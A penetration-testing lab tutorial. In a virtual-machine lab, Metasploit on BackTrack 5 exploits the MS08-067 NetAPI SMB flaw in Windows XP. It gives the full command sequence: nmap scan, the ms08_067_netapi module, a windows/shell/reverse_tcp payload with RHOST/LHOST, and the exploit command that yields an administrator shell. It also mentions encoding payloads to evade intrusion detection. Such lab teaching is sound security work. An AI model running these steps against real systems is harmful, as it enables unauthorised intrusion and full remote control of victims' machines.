by
Rohit Patel

PWNing A System via (MSF) Metasploit Framework

PWNing A System via (MSF) Metasploit Framework

PWNing A System via (MSF) Metasploit Framework

Lab Requirements : Both OS running under my Virtual Machine.
1, Back Track 5 R3 Machine
2, Windows XP Machine

Vulnerability : This is the know Vulnerability In Windows XP and Server 2003, MS08-067 vulnerability that uses the netapi module in the Windows SMB Protocol that may be used for arbitrary code execution. The Link's for more Information regarding this Vulnerability is -

http://blogs.technet.com/b/srd/archive/2008/10/23/more-detail-about-ms08-067.aspx
http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=21702
http://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi

Effect Of MS08-067 NetAPI Vulnerability :
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

Here, I have mentioned below the basic steps to perform the MSF via Modules, Payloads and Exploits -

1, Workspaces (Information stored here in form of database) :
Logical Section of the Metasploit database so that we can Logically divide the discovered Hosts. It means that each discovered hosts is separated and stored here in Workspaces.

2, Scanning For Hosts and Services :
It means that we will discover here the services and the ports open on the Target Host.

3, Loading a Module with "use" :
Here using the module we will use the specific vulnerability for PWNing a System

4, Specify a Payload with "set" :
Now in this we will set a Payload against a Victim Machine to gain access over it.

5, Identify Targets with "RHOST" and "LHOST" :
Over here we will be using our Source IP as LHOST which is Local Host and Victim IP will be RHOST which means Remote Host.

6, Launching the Exploits :
Once all set and done then we are ready to Exploit the Victim Machine.

Introduction :
When I say "Penetration Testing Tool" the first thing that comes to your mind is the world's largest Ruby project, with over 700,000 lines of code 'Metasploit' . No wonder it had become the de-facto standard for penetration testing and vulnerability development with more than one million unique downloads per year and the world's largest, public database of quality assured exploits.

The Metasploit Framework is a program and sub-project developed by Metasploit LLC. It was initially created in 2003 in the Perl programming language, but was later completely re-written in the Ruby Programming Language. With the most recent release Metasploit has taken exploit testing and simulation to a complete new level which has muscled out its high priced commercial counterparts by increasing the speed and legality of code of exploit in shortest possible time.

In this article, I will walk your through detailed step by step sequence of commands along with graphical illustrations to perform effective penetration testing using Metasploit framework.

Working with Metasploit :
Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers. Metasploit Framework follows these common steps while exploiting a any target system

Select and configure the exploit to be targeted. This is the code that will be targeted toward a system with the intention of taking advantage of a defect in the software.Validate whether the chosen system is susceptible to the chosen exploit.

Select and configure a payload that will be used. This payload represents the code that will be run on a system after a loop-hole has been found in the system and an entry point is set.
Select and configure the encoding schema to be used to make sure that the payload can evade Intrusion Detection Systems with ease.

Execute the Exploit :
Metasploit framework has three work environments, the msfconsole, the msfcli interface and the msfweb interface. However, the primary and the most preferred work area is the 'msfconsole'. It is an efficient command-line interface that has its own command set and environment system.

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.

MSF Commands and Usage :
1, search <keyword>: Typing in the command 'search' along with the keyword lists out the various possible exploits that have that keyword pattern.

2, show exploits: Typing in the command 'show exploits' lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.

3, show payloads: With the same 'show' command, we can also list the payloads available. We can use a 'show payloads' to list the payloads.

4, show options: Typing in the command 'show options' will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set.

5, info <type> <name>: If you want specific information on an exploit or payload, you are able to use the 'info' command. Let's say we want to get complete info of the payload 'winbind'. We can use 'info payload winbind'.

6, use <exploit_name>: This command tells Metasploit to use the exploit with the specified name.

7, set RHOST <hostname_or_ip>: This command will instruct Metasploit to target the specified remote host.

8, set RPORT <host_port>: This command sets the port that Metasploit will connect to on the remote host.

9, set PAYLOAD <generic/shell_bind_tcp>: This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited.

10, set LPORT <local_port>: This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server (i.e.it is not in use by another service and not reserved for administrative use), so set it to a random 4 digitnumber greater than 1024, and you should be fine. You'll have to change the number each time you successfully exploit a service as well.

11, exploit: Actually exploits the service. Another version of exploit, rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console

12, help: The 'help' command will give you basic information of all the commands that are not listed out here.

Now that you are ready with all the basic commands you need to launch your exploit, lets get in action with live target system using Metasploit.

Step 1, On Backtrack 5 machine follow the steps mentioned via GUI Interface -
Application > BackTrack > Exploitation Tools > Network Exploit Tools > Metasploit Framework > msfconsole.

Else in the Terminal simply type the "msfconsole". It will open a MSF Framework as shown in the above Image.

Once, We are in msfconsole we can check the Default Database (Workspace) which normally stores the Information regarding the Discovered Hosts and logically separates them by creating our own Workspace (database). Also, We can see the general Information regarding the database by typing the "db_status" command. However, For help regarding the workspace we can use the command like "workspace -h". To create our own workspace we can use the command "workspace -a <any_name>". Then once that created will become the default workspace and on scanning the network all Information will be stored under it. Refer the Image below -

To check the database (workspace) created and is set to default or not just type -
"workspace" and it show the default workspace with "*" mark infront of the name. As in my case I have created TestLab1 and hence it's set to default one now.

Step 2, Now we will run the following command which is "db_nmap -T4 -A 10.0.0.2".
As this will help us to get Information regarding the Victim machine whose IP is 10.0.0.2 and via which we will get the Information related to the services running on the source machine, ports open/closed, Operating System running on the Target IP. For more Info refer the snapshot

Once the nmap scan is finished we will see the services running under the Victim Machine as well as the Ports, Services, Operating System running on the target machine.

The above "db_nmap" scan shows that the scanning finished in 30.3 seconds and detected open ports, services, OS running on the Target Machine.

Step 3, Now Once we have scanned the concerned Victim Machine and found the SMB Service running on the Target Machine and hence we will use this Service for gaining access from our Backtrack 5 Machine which is an Attacker Machine. However, As we hace scanned the Victim then his entry will be created inside the database and which we can see by simply running the
"hosts" command. Refer Image below for further Information -

Step 4, As we have detected the SMB Service running on the Target Host which is vulnerable and we will use that for our further access on the Victim Machine.
Now to check the services running on the target machine we can use the command tool like "services". As the Scanned Information is stored in the Workspace we created and hence from there we are fetching the Services Running on the Victim Machine.

Step 5, Now we will go ahead and load a module into Metasploit by searching the Vulnerability.

In our case as we know the the vulnerability in Windows Server 2003 / Windows XP.

Hence, We will simply type the command line like "search netapi". This will search and list the modules matching with the word "netapi".

As from the above snapshot we can see that it has listed the matching modules and showed the Rank wise. As a result we will now be using the Fourth number Module which has the Rank of great, this is because it has maximum no. of chances to succeed and evade the Victim's Machine.

Now we will use the above Module marked in Red Colour which is "exploit/windows/smb/ms08_067_netapi" using the command called "use" which will change our current directory to the same like "exploit/windows/smb/ms08_067_netapi". Refer the Image -

Step 6, Now with this exploit "exploit/windows/smb/ms08_067_netapi" there are various amount of payload's which we can use to create a Reverse TCP Shell to our Machine with that of the Victim's Machine. However, to check the payloads related to the said vulnerability we can use this command which is "show payloads" which will show/list us the no. of payloads.
But in our case we will be usiing the payload called "windows/shell/reverse_tcp".
"windows/shell/reverse_tcp" it will create a Covert Channel between the Victim's Machine and our BackTrack Machine. Refer the Image

Step 7, Now when we have decided to use the Module "windows/shell/reverse_tcp" to create a covert channel between the Attacker and the Victim Machine at that time we will use the command like "set" where the full command will be "set payload windows/shell/reverse_tcp".

Step 8, Now when all is set then we will use the command like "show options" to set the RHOST and the LNOST where the RHOST is Remote Host means the Windows XP Machine and the LHOST is Local Host (Attacker Machine) running the BackTrack 5 Operating System. Before we proceed further we can see that on the Remote Host port 445 is active where the vulnerability lies and through which we will be creating a covert channel listening to one of the post on the Attacker's Machine which is BackTrack 5. Refer the Image -

Step 9, Now we will set the RHOST IP address and the LHOST IP address and then verify them.

To set the RHOST IP which is 10.0.0.2 we will use the command like "set RHOST 10.0.0.2" and this is the same process for the LHOST which is Backtrack 5 machine "set LHOST 10.0.0.4".

TO verify the same we set correctly or not we will use the command like "show options" which will show that the RHOST and LHOST are set correctly.

Step 10, Now we will verify the IP set correctly is appropriate or not on both the Machine like Backtrack 5 (LHOST) and the Windows XP machine (RHOST).

For Verifying IP In Windows XP Machine refer the Image shown below and I have already configured my Networking stuffs in BackTrack 5 which is having an IP 10.0.0.4.

Step 11, Now our last step left is to exploit the Victim machine running with the SMB (netapi) Vulnerability by executing the command "exploit" from the msf console.

Hence, This will create a Covert Connection / Channel using a Reverse TCP Shell whihc we have selected in our previous steps and we will be directly logged into the command prompt of the Victim's Windows machine where the current directory will be "C:\windows\system32\" folder from where we can execute anything as we have gained an Administrator Access.

Hence, Now from this command prompt we can run and execute any command we feel like.

From here you can now edit create directory, move or do anything you feel like in the Victim Machine.

Summary : Thus we have successfully used Metasploit Framework to break into the Remote Windows XP Machine and get shell access which can be used to control the remote machine and perform any kind of operations.

Here are potential uses of the Metasploit Framework :-

1, Metasploit can be used during penetration testing to validate the reports by other automatic vulnerability assessment tools to prove that the vulnerability is not a false positive and can be exploited. Care has to taken because not only does it disprove false positives, but it can also breaks things.

2, Metasploit can be used to test the new exploits that come up nearly everyday on your locally hosted test servers to understand the effectiveness of the exploit.

3, Metasploit is also a great testing tool for your intrusion detection systems to test whether the IDS is successful in preventing the attacks that we use to bypass it.

Conclusion : This article presented high level overview of using Metasploit for Penetration Testing with example of exploiting RPC (Remote Procedure Call) Vulnerability in remote Windows XP Machine. Armed with this basic knowledge along with more research, you can create your own exploits and perform Penetration Testing like never before.

"KEEP CALM AND STAY AWAKE"